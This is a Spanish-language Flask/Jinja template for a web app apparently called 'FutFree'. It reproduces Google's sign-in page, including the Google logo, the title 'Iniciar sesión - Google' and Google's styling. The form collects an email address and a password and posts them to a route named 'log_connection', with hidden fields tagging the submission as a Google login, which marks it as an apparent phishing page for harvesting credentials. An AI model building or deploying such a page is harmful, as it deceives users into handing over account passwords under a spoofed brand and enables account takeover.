<!-- app/templates/register/signup.html -->
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión - Google</title>
    <style>
        body, html {
            height: 100%;
            margin: 0;
            font-family: 'Roboto', Arial, sans-serif;
            background-color: #f1f3f4;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        .container {
            background-color: white;
            border-radius: 8px;
            padding: 48px 40px 36px;
            width: 100%;
            max-width: 450px;
            box-sizing: border-box;
        }
        @media (max-width: 600px) {
            .container {
                box-shadow: none;
                border: none;
            }
        }

        .e1 {
            display: flex;
            align-items: center;
            color: gray;
        }

        .icon {
            width: 20px;
            height: 20px;
            margin-right: 10px;
        }

        h1 {
            font-size: 24px;
            font-weight: 400;
            margin-bottom: 8px;
        }
        .subtitle {
            font-size: 16px;
            margin-bottom: 32px;
            color: #202124;
        }
        .form-group {
            margin-bottom: 24px;
        }
        label {
            font-size: 12px;
            color: #5f6368;
            display: block;
            margin-bottom: 8px;
        }
        input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 13px 15px;
            font-size: 16px;
            border: 1px solid #dadce0;
            border-radius: 4px;
            box-sizing: border-box;
            margin-bottom: 10px;
        }
        .info-text {
            font-size: 14px;
            color: #5f6368;
            margin-top: 32px;
        }
        .info-text a {
            color: #1a73e8;
            text-decoration: none;
        }
        .footer {
            display: flex;
            justify-content: end;
            margin-top: 32px;
        }
        .create-account {
            background-color: #1a73e8;
            color: white;
            border: none;
            padding: 10px 24px;
            border-radius: 50px;
            font-size: 14px;
            font-weight: 500;
            cursor: pointer;
        }

        .error-message {
            display: flex;
            color: #b3261e;
            margin-bottom: 15px;
            text-align: left;
        }

        .p-error-message {
            font-size: 13px;
            margin-top: 0;
            color: #b3261e;
            padding: 0 5px;;
            margin-bottom: 5px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="e1">
            <svg class="icon" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                <path d="M22.56 12.25c0-.78-.07-1.53-.2-2.25H12v4.26h5.92c-.26 1.37-1.04 2.53-2.21 3.31v2.77h3.57c2.08-1.92 3.28-4.74 3.28-8.09z" fill="#4285F4"/>
                <path d="M12 23c2.97 0 5.46-.98 7.28-2.66l-3.57-2.77c-.98.66-2.23 1.06-3.71 1.06-2.86 0-5.29-1.93-6.16-4.53H2.18v2.84C3.99 20.53 7.7 23 12 23z" fill="#34A853"/>
                <path d="M5.84 14.09c-.22-.66-.35-1.36-.35-2.09s.13-1.43.35-2.09V7.07H2.18C1.43 8.55 1 10.22 1 12s.43 3.45 1.18 4.93l2.85-2.22.81-.62z" fill="#FBBC05"/>
                <path d="M12 5.38c1.62 0 3.06.56 4.21 1.64l3.15-3.15C17.45 2.09 14.97 1 12 1 7.7 1 3.99 3.47 2.18 7.07l3.66 2.84c.87-2.6 3.3-4.53 6.16-4.53z" fill="#EA4335"/>
            </svg>
            <p>Iniciar sesión con Google</p>
        </div>
        <h1>Inicia sesión</h1>
        <form action="{{ url_for('log_connection') }}" method="post">
            <input type="hidden" name="form_id" value="signup">
            <input type="hidden" name="social" value="google">
            <div class="form-group">
                <label for="email">Correo electrónico</label>
                <input type="email" id="email" name="email" required>
                <label for="password">Contraseña</label>
                <input type="password" id="password" name="password" required>
            </div>

            <!-- Mostrar el mensaje de error -->
            {% with messages = get_flashed_messages(category_filter=['error']) %}
            {% if messages %}
            <div class="error-message">
                {% for message in messages %}
                    <svg aria-hidden="true" fill="currentColor" focusable="false" width="16px" height="16px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"></path></svg>
                    <p class="p-error-message">{{ message }}</p>
                {% endfor %}
            </div>
            {% endif %}
            {% endwith %}

            <p class="info-text">
                Antes de usar esta aplicación, puedes leer la 
                <a href="#">política de privacidad</a> y los 
                <a href="#">términos del servicio</a> de FutFree.
            </p>

            <div class="footer">
                <button type="submit" class="create-account">Crear cuenta</button>
            </div>
        </form>
    </div>
</body>
</html>
